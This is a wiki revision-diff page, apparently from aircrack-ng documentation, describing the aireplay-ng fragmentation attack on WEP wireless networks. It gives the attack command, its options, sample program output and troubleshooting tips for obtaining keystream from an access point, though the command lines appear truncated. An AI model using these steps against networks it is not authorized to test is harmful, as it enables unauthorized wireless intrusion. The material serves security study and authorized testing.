fragmentation
Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revisionNext revision | Previous revisionNext revisionBoth sides next revision | ||
fragmentation [2007/03/10 23:22] – change to standard format and add troubleshooting info darkaudax | fragmentation [2007/04/29 21:30] – added additional usage and troubleshooting information darkaudax | ||
---|---|---|---|
Line 1: | Line 1: | ||
+ | ====== Fragmentation Attack ====== | ||
+ | |||
+ | |||
+ | |||
+ | ===== Description ===== | ||
+ | This attack, when successful, can obtain 1500 bytes of PRGA (pseudo random generation algorithm). This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to generate packets with [[packetforge-ng]] which are in turn used for various injection attacks. | ||
+ | |||
+ | Basically, the program obtains a small amount of keying material from the packet then attempts to send ARP and/or LLC packets with known content to the access point (AP). If the packet is successfully echoed back by the AP then a larger amount of keying information can be obtained from the returned packet. | ||
+ | |||
+ | The original paper by Andrea Bittau at http:// | ||
+ | |||
+ | ===== Usage ===== | ||
+ | |||
+ | aireplay-ng -5 -b 00: | ||
+ | Where: | ||
+ | *-5 means run the fragmentation attack | ||
+ | *-b 00: | ||
+ | *-h 00: | ||
+ | *ath0 is the interface name | ||
+ | |||
+ | Optionally, the following filters can be applied: | ||
+ | *-b bssid : MAC address, Access Point | ||
+ | *-d dmac : MAC address, Destination | ||
+ | *-s smac : MAC address, Source | ||
+ | *-m len : minimum packet length | ||
+ | *-n len : maximum packet length | ||
+ | *-u type : frame control, type field | ||
+ | *-v subt : frame control, subtype field | ||
+ | *-t tods : frame control, To DS bit | ||
+ | *-f fromds : frame control, From DS bit | ||
+ | *-w iswep : frame control, WEP bit | ||
+ | |||
+ | Optionally, the following replay options can be set: | ||
+ | *-k IP : set destination IP in fragments - defaults to 255.255.255.255 | ||
+ | *-l IP : set source IP in fragments - defaults to 255.255.255.255 | ||
+ | |||
+ | |||
+ | ===== Usage Example ===== | ||
+ | |||
+ | |||
+ | |||
+ | Essentially you start the attack with the following command then select the packet you want to try:\\ | ||
+ | aireplay-ng -5 -b 00: | ||
+ | | ||
+ | Waiting for a data packet... | ||
+ | Read 96 packets... | ||
+ | | ||
+ | Size: 120, FromDS: 1, ToDS: 0 (WEP) | ||
+ | | ||
+ | | ||
+ | Dest. MAC = 00: | ||
+ | Source MAC = 00: | ||
+ | | ||
+ | 0x0000: | ||
+ | 0x0010: | ||
+ | 0x0020: | ||
+ | 0x0030: | ||
+ | 0x0040: | ||
+ | 0x0050: | ||
+ | 0x0060: | ||
+ | 0x0070: | ||
+ | | ||
+ | Use this packet ? y | ||
+ | |||
+ | The program responds (or similar): | ||
+ | |||
+ | | ||
+ | Data packet found! | ||
+ | | ||
+ | Got RELAYED packet!! | ||
+ | Thats our ARP packet! | ||
+ | | ||
+ | Got RELAYED packet!! | ||
+ | Thats our ARP packet! | ||
+ | | ||
+ | Got RELAYED packet!! | ||
+ | Thats our ARP packet! | ||
+ | | ||
+ | Now you can build a packet with packetforge-ng out of that 1500 bytes keystream | ||
+ | |||
+ | You have successfully obtained the PRGA which is stored in the file named by the program. | ||
+ | |||
+ | ===== Usage Tips ===== | ||
+ | |||
+ | *The source MAC address used in the attack must be associated with the access point. | ||
+ | |||
+ | *For madwifi-ng drivers (Atheros chipset), you must change MAC address of your card to the MAC address you will injecting with otherwise the attack will not work. See this [[faq# | ||
+ | |||
+ | * The fragmentation attack sends out a large number of packets that must all be received by the AP for the attack to be successful. | ||
+ | |||
+ | * The [[tutorial|tutorials page]] have a number of tutorials which utilize the fragmentation attack. | ||
+ | |||
+ | ===== Usage Troubleshooting ===== | ||
+ | |||
+ | * Make sure your card can successfully inject. | ||
+ | * Make sure the MAC you are using for injection is associated with the AP. | ||
+ | * Make sure you are on the same channel as the AP. | ||
+ | * Also see the general aireplay-ng troubleshooting ideas: [[aireplay-ng# | ||
+ | |||
fragmentation.txt · Last modified: 2009/09/05 23:32 by mister_x